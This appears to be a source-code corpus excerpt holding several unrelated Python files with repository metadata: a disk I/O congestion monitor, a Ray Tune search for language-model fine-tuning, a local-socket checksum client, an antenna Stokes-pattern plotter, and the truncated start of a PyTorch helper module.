| 0
| 0
|
1
| 0
|
869e8784f6deaecfb703cc98502b159dc7530a96
| 5,330
|
py
|
Python
|
middleware/io-monitor/recipes-common/io-monitor/io-monitor/io_monitor/utils/data_collector.py
|
xe1gyq/stx-utils
|
93b7f7dc2c6732db8c8ae0eb3f52ace4df714dc9
|
[
"Apache-2.0"
] | null | null | null |
middleware/io-monitor/recipes-common/io-monitor/io-monitor/io_monitor/utils/data_collector.py
|
xe1gyq/stx-utils
|
93b7f7dc2c6732db8c8ae0eb3f52ace4df714dc9
|
[
"Apache-2.0"
] | null | null | null |
middleware/io-monitor/recipes-common/io-monitor/io-monitor/io_monitor/utils/data_collector.py
|
xe1gyq/stx-utils
|
93b7f7dc2c6732db8c8ae0eb3f52ace4df714dc9
|
[
"Apache-2.0"
] | null | null | null |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import logging
import os
from io_monitor.constants import DOMAIN
from io_monitor.utils.data_window import DataCollectionWindow
LOG = logging.getLogger(DOMAIN)
class DeviceDataCollector(object):
# Moving average windows
MA_WINDOW_SMA = 0
MA_WINDOW_MED = 1
MA_WINDOW_LAR = 2
# Device status
STATUS_NORMAL = "N"
STATUS_BUILDING = "B"
STATUS_CONGESTED = "L"
# Data tracked
DATA_IOPS = "iops"
DATA_AWAIT = "await"
def __init__(self, device_node, data_elements,
size_sma, size_med, size_lar):
self.node = device_node
if os.path.exists('/sys/block/' + self.node + '/dm/name'):
self.name = open('/sys/block/' + self.node + '/dm/name',
'r').read().rstrip()
else:
self.name = self.node
self.data_dict = {}
self.data_caps = {self.DATA_AWAIT: -1, self.DATA_IOPS: -1}
self.timestamp = None
self.congestion_status = self.STATUS_NORMAL
self.congestion_await_minimal_spike = -1
self.congestion_await_sustained = -1
for element in data_elements:
self.data_dict.update({element: [
DataCollectionWindow(size_sma, stuck_data_override=True),
DataCollectionWindow(size_med, stuck_data_override=True),
DataCollectionWindow(size_lar, stuck_data_override=True)]})
def update_congestion_status(self):
# Bail if threshold is not set
if self.congestion_await_sustained == -1:
return
ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)
ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)
ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)
# Set the congestion status based on await moving average
if self.congestion_status is self.STATUS_NORMAL:
if ma_sma > self.congestion_await_sustained:
self.congestion_status = self.STATUS_BUILDING
if self.congestion_status is self.STATUS_BUILDING:
if ma_lar > self.congestion_await_sustained:
self.congestion_status = self.STATUS_CONGESTED
LOG.warn("Node %s (%s) is experiencing high await times."
% (self.node, self.name))
elif ma_sma < self.congestion_await_sustained:
self.congestion_status = self.STATUS_NORMAL
if self.congestion_status is self.STATUS_CONGESTED:
if ma_med < self.congestion_await_sustained:
self.congestion_status = self.STATUS_BUILDING
def update_data(self, ts, element, value):
self.timestamp = ts
# LOG.debug("%s: e = %s, v= %f" % (self.node, element, value))
for w in [self.MA_WINDOW_SMA,
self.MA_WINDOW_MED,
self.MA_WINDOW_LAR]:
self.data_dict[element][w].update(value, self.data_caps[element])
def get_latest(self, element):
if element not in self.data_dict:
LOG.error("Error: invalid element requested = %s" % element)
return 0
return self.data_dict[element][self.MA_WINDOW_SMA].get_latest()
def get_average(self, element, window):
if window not in [self.MA_WINDOW_SMA,
self.MA_WINDOW_MED,
self.MA_WINDOW_LAR]:
LOG.error("WindowError: invalid window requested = %s" % window)
return 0
if element not in self.data_dict:
LOG.error("Error: invalid element requested = %s" % element)
return 0
return self.data_dict[element][window].get_average()
def is_data_stale(self, ts):
return not (ts == self.timestamp)
def get_congestion_status(self, debug=False):
if debug:
ma_sma = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_SMA)
ma_med = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_MED)
ma_lar = self.get_average(self.DATA_AWAIT, self.MA_WINDOW_LAR)
LOG.debug("%s [ %6.2f %6.2f %6.2f ] %d" %
(self.node, ma_sma, ma_med, ma_lar,
self.congestion_await_sustained))
return self.congestion_status
def set_data_caps(self, element, cap):
if element in self.data_caps:
self.data_caps[element] = cap
def set_congestion_thresholds(self, await_minimal_spike,
await_sustained_congestion):
self.congestion_await_minimal_spike = await_minimal_spike
self.congestion_await_sustained = await_sustained_congestion
def get_element_windows_avg_list(self, element):
return [self.get_average(element, self.MA_WINDOW_SMA),
self.get_average(element, self.MA_WINDOW_MED),
self.get_average(element, self.MA_WINDOW_LAR)]
def get_element_windows_avg_string(self, element):
return "%s [ %9.2f, %9.2f, %9.2f ]" % (
element,
self.get_average(element, self.MA_WINDOW_SMA),
self.get_average(element, self.MA_WINDOW_MED),
self.get_average(element, self.MA_WINDOW_LAR))
| 36.013514
| 77
| 0.630206
| 678
| 5,330
| 4.679941
| 0.185841
| 0.055468
| 0.071856
| 0.070596
| 0.503309
| 0.431768
| 0.364324
| 0.332178
| 0.332178
| 0.313899
| 0
| 0.008314
| 0.277861
| 5,330
| 147
| 78
| 36.258503
| 0.816056
| 0.059475
| 0
| 0.227723
| 0
| 0
| 0.0532
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108911
| false
| 0
| 0.039604
| 0.029703
| 0.336634
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869e8ff896779ff36d9b024ced2d268e80c7682a
| 19,793
|
py
|
Python
|
examples/language-modeling/debias_lm_hps_tune.py
|
SoumyaBarikeri/transformers
|
996c6e113404000f50444287aa8a31a174ebd92f
|
[
"Apache-2.0"
] | 1
|
2021-08-07T06:06:45.000Z
|
2021-08-07T06:06:45.000Z
|
examples/language-modeling/debias_lm_hps_tune.py
|
SoumyaBarikeri/transformers
|
996c6e113404000f50444287aa8a31a174ebd92f
|
[
"Apache-2.0"
] | null | null | null |
examples/language-modeling/debias_lm_hps_tune.py
|
SoumyaBarikeri/transformers
|
996c6e113404000f50444287aa8a31a174ebd92f
|
[
"Apache-2.0"
] | 2
|
2021-05-31T08:50:50.000Z
|
2022-01-26T13:14:58.000Z
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for language modeling on a text file (GPT, GPT-2, CTRL, BERT, RoBERTa, XLNet).
GPT, GPT-2 and CTRL are fine-tuned using a causal language modeling (CLM) loss. BERT and RoBERTa are fine-tuned
using a masked language modeling (MLM) loss. XLNet is fine-tuned using a permutation language modeling (PLM) loss.
"""
import logging
import math
import os
from dataclasses import dataclass, field
from typing import Optional
import torch
from transformers.optimization import AdamW, get_linear_schedule_with_warmup
from transformers import (
CONFIG_MAPPING,
MODEL_WITH_LM_HEAD_MAPPING,
AutoConfig,
AutoModelWithLMHead,
AutoTokenizer,
DataCollatorForLanguageModeling,
DataCollatorForPermutationLanguageModeling,
HfArgumentParser,
# LineByLineTextDatasetLabels,
LineByLineTextDataset,
PreTrainedTokenizer,
TextDataset,
Trainer,
TrainingArguments,
set_seed,
)
import ray
from ray import tune
from transformers.file_utils import is_torch_tpu_available
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
from ray.tune.schedulers import PopulationBasedTraining
from ray.tune import CLIReporter
# if is_wandb_available():
# import wandb
ray.shutdown()
ray.init(log_to_driver=True, ignore_reinit_error=True)
logger = logging.getLogger(__name__)
MODEL_CONFIG_CLASSES = list(MODEL_WITH_LM_HEAD_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": "The model checkpoint for weights initialization. Leave None if you want to train a model from scratch."
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
)
force_pad_token: bool = field(
default=False,
metadata={
"help": "Whether to force the addition of a padding token to tokenizer that does not already have one."
},
)
debiasing_head: Optional[str] = field(
default=None, metadata={"help": "The type of de-biasing head to be used"}
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
train_data_file: Optional[str] = field(
default=None, metadata={"help": "The input training data file (a text file)."}
)
eval_data_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
line_by_line: bool = field(
default=False,
metadata={"help": "Whether distinct lines of text in the dataset are to be handled as distinct sequences."},
)
mlm: bool = field(
default=False, metadata={"help": "Train with masked-language modeling loss instead of language modeling."}
)
mlm_probability: float = field(
default=0.15, metadata={"help": "Ratio of tokens to mask for masked language modeling loss"}
)
plm_probability: float = field(
default=1 / 6,
metadata={
"help": "Ratio of length of a span of masked tokens to surrounding context length for permutation language modeling."
},
)
max_span_length: int = field(
default=5, metadata={"help": "Maximum length of a span of masked tokens for permutation language modeling."}
)
block_size: int = field(
default=-1,
metadata={
"help": "Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens)."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
def get_dataset(
args: DataTrainingArguments,
tokenizer: PreTrainedTokenizer,
evaluate: bool = False,
cache_dir: Optional[str] = None,
):
file_path = args.eval_data_file if evaluate else args.train_data_file
if args.line_by_line:
return LineByLineTextDataset(tokenizer=tokenizer, file_path=file_path, block_size=args.block_size)
# return LineByLineTextDatasetLabels(tokenizer=tokenizer, file_path=file_path, block_size=args.block_size)
else:
return TextDataset(
tokenizer=tokenizer,
file_path=file_path,
block_size=args.block_size,
overwrite_cache=args.overwrite_cache,
cache_dir=cache_dir,
)
class TuneTransformerTrainer(Trainer):
def create_optimizer_and_scheduler(self, num_training_steps: int):
if self.optimizer is None:
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in self.model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": self.args.weight_decay,
},
{
"params": [p for n, p in self.model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
},
]
self.optimizer = AdamW(
optimizer_grouped_parameters,
lr=self.args.learning_rate,
betas=(self.args.adam_beta1, self.args.adam_beta2),
eps=self.args.adam_epsilon,
)
if self.lr_scheduler is None:
self.lr_scheduler = get_linear_schedule_with_warmup(
self.optimizer, num_warmup_steps=self.args.warmup_steps, num_training_steps=num_training_steps
)
return self.current_optimizer, self.current_scheduler
def evaluate(self,
eval_dataset= None):
eval_dataloader = self.get_eval_dataloader(eval_dataset)
output = self.prediction_loop(
eval_dataloader, description="Evaluation")
self.log(output.metrics)
self.save_state()
tune.report(**output.metrics)
return output.metrics
def save_state(self):
with tune.checkpoint_dir(step=self.global_step) as checkpoint_dir:
self.args.output_dir = checkpoint_dir
# This is the directory name that Huggingface requires.
output_dir = os.path.join(
self.args.output_dir,
f"{PREFIX_CHECKPOINT_DIR}-{self.global_step}")
self.save_model(output_dir)
self.current_optimizer, self.current_scheduler = self.create_optimizer_and_scheduler(360)
if self.is_world_master():
torch.save(self.current_optimizer.state_dict(),
os.path.join(output_dir, "optimizer.pt"))
torch.save(self.current_scheduler.state_dict(),
os.path.join(output_dir, "scheduler.pt"))
def recover_checkpoint(tune_checkpoint_dir, model_name=None):
if tune_checkpoint_dir is None or len(tune_checkpoint_dir) == 0:
return model_name
# Get subdirectory used for Huggingface.
subdirs = [
os.path.join(tune_checkpoint_dir, name)
for name in os.listdir(tune_checkpoint_dir)
if os.path.isdir(os.path.join(tune_checkpoint_dir, name))
]
# There should only be 1 subdir.
assert len(subdirs) == 1, subdirs
return subdirs[0]
# def train_transformer(config, checkpoint_dir=None):
# train_dataset, eval_dataset = get_datasets(config)
#
# training_args = TrainingArguments(
# output_dir=tune.get_trial_dir(),
# learning_rate=config["learning_rate"],
# do_train=True,
# do_eval=True,
# evaluate_during_training=True,
# # Run eval after every epoch.
# eval_steps=(len(train_dataset) // config["per_gpu_train_batch_size"]) +
# 1,
# # We explicitly set save to 0, and do checkpointing in evaluate instead
# save_steps=0,
# num_train_epochs=config["num_epochs"],
# max_steps=config["max_steps"],
# per_device_train_batch_size=config["per_gpu_train_batch_size"],
# per_device_eval_batch_size=config["per_gpu_val_batch_size"],
# warmup_steps=0,
# weight_decay=config["weight_decay"],
# logging_dir="./logs",
# )
#
# model_name_or_path = recover_checkpoint(checkpoint_dir, config["model_name"])
# # num_labels = glue_tasks_num_labels[config["task_name"]]
#
# config = AutoConfig.from_pretrained(
# model_name_or_path,
# num_labels=num_labels,
# finetuning_task=task_name,
# )
# model = AutoModelForSequenceClassification.from_pretrained(
# model_name_or_path,
# config=config,
# )
#
# # Use our modified TuneTransformerTrainer
# tune_trainer = TuneTransformerTrainer(
# model=model,
# args=training_args,
# train_dataset=train_dataset,
# eval_dataset=eval_dataset,
# compute_metrics=utils.build_compute_metrics_fn(task_name),
# )
# tune_trainer.train(model_name_or_path)
def train_transformer(config, checkpoint_dir=None):
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
# parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
# model_args, data_args, training_args = parser.parse_args_into_dataclasses()
if data_args.eval_data_file is None and training_args.do_eval:
raise ValueError(
"Cannot do evaluation without an evaluation data file. Either supply a file to --eval_data_file "
"or remove the --do_eval argument."
)
if (
os.path.exists(training_args.output_dir)
and os.listdir(training_args.output_dir)
and training_args.do_train
and not training_args.overwrite_output_dir
):
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. Use --overwrite_output_dir to overcome."
)
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,
)
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
training_args.local_rank,
training_args.device,
training_args.n_gpu,
bool(training_args.local_rank != -1),
training_args.fp16,
)
logger.info("Training/evaluation parameters %s", training_args)
# Set seed
set_seed(training_args.seed)
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
if model_args.config_name:
config_in = AutoConfig.from_pretrained(model_args.config_name, cache_dir=model_args.cache_dir)
elif model_args.model_name_or_path:
config_in = AutoConfig.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)
else:
config_in = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, cache_dir=model_args.cache_dir)
elif model_args.model_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported, but you can do it from another script, save it,"
"and load it from here, using --tokenizer_name"
)
if tokenizer.pad_token_id is None:
if model_args.force_pad_token:
# See PR 3388. Some tokenizers don't had pad tokens which causes errors at the encoding step in the collate_fn.
# We give here the option to force the addition of a pad token. The attention mask is used to ignore this token
# when feeding to the model.x
tokenizer.add_special_tokens({"pad_token": "<pad>"})
else:
logger.warning(
"Attempting to train a model whose tokenizer has no padding token. This may result in errors in the encoding step. Set the --force_pad_token flag to fix this."
)
model_name_or_path = recover_checkpoint(checkpoint_dir, config["model_name"])
if model_args.model_name_or_path:
model = AutoModelWithLMHead.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config_in,
cache_dir=model_args.cache_dir,
)
else:
logger.info("Training new model from scratch")
model = AutoModelWithLMHead.from_config(config_in)
special_tokens_dict = {'bos_token': '<bos>', 'eos_token': '<eos>', 'pad_token': '<pad>'}
num_added_toks = tokenizer.add_special_tokens(special_tokens_dict)
model.resize_token_embeddings(len(tokenizer))
if config_in.model_type in ["bert", "roberta", "distilbert", "camembert"] and not data_args.mlm:
raise ValueError(
"BERT and RoBERTa-like models do not have LM heads but masked LM heads. They must be run using the"
"--mlm flag (masked language modeling)."
)
if data_args.block_size <= 0:
data_args.block_size = tokenizer.max_len
# Our input block size will be the max possible for the model
else:
data_args.block_size = min(data_args.block_size, tokenizer.max_len)
# Get datasets
train_dataset = (
get_dataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir) if training_args.do_train else None
)
# print('train_dataset {}'.format(train_dataset.examples[0]))
eval_dataset = (
get_dataset(data_args, tokenizer=tokenizer, evaluate=True, cache_dir=model_args.cache_dir)
if training_args.do_eval
else None
)
if config_in.model_type == "xlnet":
data_collator = DataCollatorForPermutationLanguageModeling(
tokenizer=tokenizer,
plm_probability=data_args.plm_probability,
max_span_length=data_args.max_span_length,
)
else:
data_collator = DataCollatorForLanguageModeling(
tokenizer=tokenizer, mlm=data_args.mlm, mlm_probability=data_args.mlm_probability
)
training_args = TrainingArguments(
output_dir=tune.get_trial_dir(),
learning_rate=config["learning_rate"],
do_train=True,
do_eval=True,
evaluate_during_training=True,
# Run eval after every epoch.
eval_steps=(len(train_dataset) // config["per_gpu_train_batch_size"]) + 1,
# We explicitly set save to 0, and do checkpointing in evaluate instead
save_steps=0,
num_train_epochs=config["num_epochs"],
max_steps=config["max_steps"],
per_device_train_batch_size=config["per_gpu_train_batch_size"],
per_device_eval_batch_size=config["per_gpu_val_batch_size"],
warmup_steps=0,
weight_decay=config["weight_decay"],
logging_dir="./logs")
# Initialize our Trainer
tune_trainer = TuneTransformerTrainer(
model=model,
args=training_args,
data_collator=data_collator,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
prediction_loss_only=True,
# compute_metrics=compute_metrics,
)
if training_args.do_train:
model_path = (
model_args.model_name_or_path
if model_args.model_name_or_path is not None and os.path.isdir(model_args.model_name_or_path)
else None
)
tune_trainer.train(model_path=model_path)
if __name__ == "__main__":
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
config = {
# These 3 configs below were defined earlier
"model_name": model_args.model_name_or_path,
"task_name": "CLM",
"data_dir": "",
"per_gpu_val_batch_size": 32,
"per_gpu_train_batch_size": tune.choice([16, 32, 64]),
"learning_rate": tune.uniform(1e-5, 5e-5),
"weight_decay": tune.uniform(0.0, 0.3),
"num_epochs": tune.choice([2, 3, 4, 5]),
"max_steps": -1, # We use num_epochs instead.
"wandb": {
"project": "pbt_transformers",
"reinit": True,
"allow_val_change": True
}
}
logger.info(config)
scheduler = PopulationBasedTraining(
time_attr="training_iteration",
metric="eval_loss",
mode="min",
perturbation_interval=2,
hyperparam_mutations={
"weight_decay": lambda: tune.uniform(0.0, 0.3).func(None),
"learning_rate": lambda: tune.uniform(1e-5, 5e-5).func(None),
"per_gpu_train_batch_size": [16, 32, 64],
})
reporter = CLIReporter(
parameter_columns={
"weight_decay": "w_decay",
"learning_rate": "lr",
"per_gpu_train_batch_size": "train_bs/gpu",
"num_epochs": "num_epochs"
},
metric_columns=[
"eval_acc", "eval_loss", "epoch", "training_iteration"
])
analysis = tune.run(
train_transformer,
resources_per_trial={
"cpu": 1,
"gpu": 1
},
config=config,
num_samples=3,
scheduler=scheduler,
keep_checkpoints_num=3,
checkpoint_score_attr="training_iteration",
progress_reporter=reporter,
local_dir="./ray_results/",
name="tune_trans")
best_config = analysis.get_best_config(metric="eval_loss", mode="min")
print(best_config)
| 38.210425
| 175
| 0.664477
| 2,475
| 19,793
| 5.071919
| 0.202424
| 0.020075
| 0.015136
| 0.020314
| 0.333307
| 0.300486
| 0.263284
| 0.204812
| 0.178125
| 0.162192
| 0
| 0.006436
| 0.24635
| 19,793
| 517
| 176
| 38.284333
| 0.835087
| 0.21548
| 0
| 0.089636
| 0
| 0.011204
| 0.203429
| 0.016628
| 0
| 0
| 0
| 0
| 0.002801
| 1
| 0.016807
| false
| 0.002801
| 0.039216
| 0
| 0.12605
| 0.002801
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869ee02cc744c1a084a226d08c1391e0d7881239
| 1,373
|
py
|
Python
|
checksums.py
|
pgp/RootHelperClientTestInteractions
|
6b9e9cc9f10eb2bf9b9dafa851ed56005f7666b5
|
[
"Apache-2.0"
] | 1
|
2019-05-04T12:29:41.000Z
|
2019-05-04T12:29:41.000Z
|
checksums.py
|
pgp/RootHelperClientTestInteractions
|
6b9e9cc9f10eb2bf9b9dafa851ed56005f7666b5
|
[
"Apache-2.0"
] | null | null | null |
checksums.py
|
pgp/RootHelperClientTestInteractions
|
6b9e9cc9f10eb2bf9b9dafa851ed56005f7666b5
|
[
"Apache-2.0"
] | null | null | null |
from net_common import *
import struct
import sys
def getDirHashOpts(withNames=False,
ignoreThumbsFiles=True,
ignoreUnixHiddenFiles=True,
ignoreEmptyDirs=True):
return bytearray([((1 if withNames else 0) +
(2 if ignoreThumbsFiles else 0) +
(4 if ignoreUnixHiddenFiles else 0) +
(8 if ignoreEmptyDirs else 0))])
if __name__ == "__main__":
sock = get_connected_local_socket()
path = encodeString('/dev/shm/exampleDir')
# path = encodeString('/dev/null')
sock.sendall(bytearray(b'\x0A')) # HASH request
# sock.sendall(bytearray(b'\x01')) # choose MD5 algorithm
sock.sendall(bytearray(b'\x06')) # choose SHA3-224 algorithm
sock.sendall(getDirHashOpts(withNames=True,ignoreUnixHiddenFiles=False)) # send dirHashOpts byte (unused for regular files)
sock.sendall(struct.pack("@H", len(path))) # len of path as unsigned short
sock.sendall(path)
resp = sock.recv(1) # response first byte: \x00 OK or \xFF ERROR
if resp != b'\x00':
print("Error byte received, errno is:", struct.unpack("@i", sock.recv(4))[0])
sys.exit(0)
# print(toHex(sock.recv(16))) # 128 bit (16 byte) md5 digest size
print(toHex(sock.recv(28))) # 224 bit (28 byte) sha3-224 digest size
sock.close()
| 40.382353
| 128
| 0.627822
| 170
| 1,373
| 5
| 0.505882
| 0.077647
| 0.070588
| 0.074118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043647
| 0.24909
| 1,373
| 33
| 129
| 41.606061
| 0.780795
| 0.255645
| 0
| 0
| 0
| 0
| 0.072277
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.12
| 0.04
| 0.2
| 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a15534f296338602eb17c7dad23025e0241a4e
| 3,208
|
py
|
Python
|
scripts/viewStokespat.py
|
David-McKenna/AntPat
|
45618659994b27e2654f1effd6d9baa15867b6d3
|
[
"ISC"
] | 5
|
2016-06-21T14:54:23.000Z
|
2021-04-06T06:23:25.000Z
|
scripts/viewStokespat.py
|
David-McKenna/AntPat
|
45618659994b27e2654f1effd6d9baa15867b6d3
|
[
"ISC"
] | null | null | null |
scripts/viewStokespat.py
|
David-McKenna/AntPat
|
45618659994b27e2654f1effd6d9baa15867b6d3
|
[
"ISC"
] | 2
|
2019-10-25T03:16:06.000Z
|
2020-11-15T14:18:46.000Z
|
#!/usr/bin/env python
"""A simple viewer for Stokes patterns based on two far-field pattern files.
(Possibly based on one FF pattern files if it has two requests: one for each
polarization channel.)"""
import os
import argparse
import numpy
import matplotlib.pyplot as plt
from antpat.reps.sphgridfun.tvecfun import TVecFields
from antpat.radfarfield import RadFarField
from antpat.dualpolelem import DualPolElem
FEKOsuffix = 'ffe'
GRASPsuffix = 'swe'
NECsuffix = 'out'
def Jones2Stokes(Jones):
"""Convert Jones matrix to Stokes vector. This assumes dual-pol antenna receiving unpolarized unit
valued radiation i.e. incoming Stokes = (1,0,0,0)."""
brightmat = numpy.matmul(Jones, numpy.swapaxes(numpy.conjugate(Jones),-1,-2))
StokesI = numpy.real(brightmat[...,0,0]+brightmat[...,1,1])
StokesQ = numpy.real(brightmat[...,0,0]-brightmat[...,1,1])
StokesU = numpy.real(brightmat[...,0,1]+brightmat[...,1,0])
StokesV = numpy.imag(brightmat[...,0,1]-brightmat[...,1,0])
return StokesI, StokesQ, StokesU, StokesV
def plotStokes_fromFEKOfiles(p_chan_file, q_chan_file, freq):
(tvf_p, tvf_q) = (TVecFields(), TVecFields())
tvf_p.load_ffe(p_chan_file)
tvf_q.load_ffe(q_chan_file)
(ant_p, ant_q) = (RadFarField(tvf_p), RadFarField(tvf_q))
(p_chan_name, q_chan_name) = (os.path.basename(p_chan_file), os.path.basename(q_chan_file))
(ant_p.name, ant_q.name) = (p_chan_name, q_chan_name)
dualpolAnt = DualPolElem(ant_p, ant_q)
THETA, PHI, Jones = dualpolAnt.getJonesPat(freq)
(StokesI, StokesQ, StokesU, StokesV) = Jones2Stokes(Jones)
x = THETA*numpy.cos(PHI)
y = THETA*numpy.sin(PHI)
#x= THETA
#y=PHI
xyNames = ('theta*cos(phi)','theta*sin(phi)')
fig = plt.figure()
ax1 = fig.add_subplot(221)
plt.pcolormesh(x, y, 10*numpy.log10(StokesI), label="I")
#plt.pcolormesh(x, y, StokesI, label="I")
plt.colorbar()
ax1.set_title('I (dB)')
ax2 = fig.add_subplot(222)
plt.pcolormesh(x, y, StokesQ/StokesI, label="Q")
plt.colorbar()
ax2.set_title('Q/I')
ax3 = fig.add_subplot(223)
plt.pcolormesh(x, y, StokesU/StokesI, label="U")
plt.colorbar()
ax3.set_title('U/I')
ax4 = fig.add_subplot(224)
plt.pcolormesh(x, y, StokesV/StokesI, label="V")
plt.colorbar()
ax4.set_title('V/I')
fig.suptitle('Stokes (azimuthal-equidistant proj) @ ' +str(freq/1e9)+' GHz')
plt.show()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("p_chan_file",
help='Filename of polarization channel p')
parser.add_argument("q_chan_file",
help='Filename of polarization channel p')
parser.add_argument("freq", nargs='?', type=float,
help="Frequency in Hertz")
args = parser.parse_args()
if args.p_chan_file.endswith(FEKOsuffix):
plotStokes_fromFEKOfiles(args.p_chan_file, args.q_chan_file, args.freq)
elif args.p_chan_file.endswith(GRASPsuffix):
print("Not implemented yet.")
elif args.p_chan_file.endswith(NECsuffix):
print("Not implemented yet.")
else:
print("Far-field pattern file type not known")
exit(1)
| 36.044944
| 102
| 0.674564
| 457
| 3,208
| 4.582057
| 0.347921
| 0.049666
| 0.034384
| 0.035817
| 0.170487
| 0.148042
| 0.08596
| 0.08596
| 0.056351
| 0.056351
| 0
| 0.019399
| 0.180486
| 3,208
| 88
| 103
| 36.454545
| 0.777102
| 0.122818
| 0
| 0.119403
| 0
| 0
| 0.105866
| 0.007868
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029851
| false
| 0
| 0.104478
| 0
| 0.149254
| 0.044776
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86a15d2cf1ab721951e4abf4f4b561d571ed4d1c
| 2,141
|
py
|
Python
|
utils.py
|
lingjiao10/Facial-Expression-Recognition.Pytorch
|
f5ba0e527347af3778d44eb7045e4970d01641a6
|
[
"MIT"
] | null | null | null |
utils.py
|
lingjiao10/Facial-Expression-Recognition.Pytorch
|
f5ba0e527347af3778d44eb7045e4970d01641a6
|
[
"MIT"
] | null | null | null |
utils.py
|
lingjiao10/Facial-Expression-Recognition.Pytorch
|
f5ba0e527347af3778d44eb7045e4970d01641a6
|
[
"MIT"
] | 1
|
2019-10-02T02:26:39.000Z
|
2019-10-02T02:26:39.000Z
|
'''Some helper functions for PyTorch, including:
- progress_bar: progress bar mimic xlua.progress.
- set_lr : set the learning rate
- clip_gradient : clip gradient
'''
import os
import sys
import time
import math
import torch
import torch.nn as nn
import torch.nn.init as init
from torch.autograd import Function
#获取控制台行、列数
if sys.platform == 'win32':
term_width = 80
else:
print('###', os.popen('stty size', 'r').read())
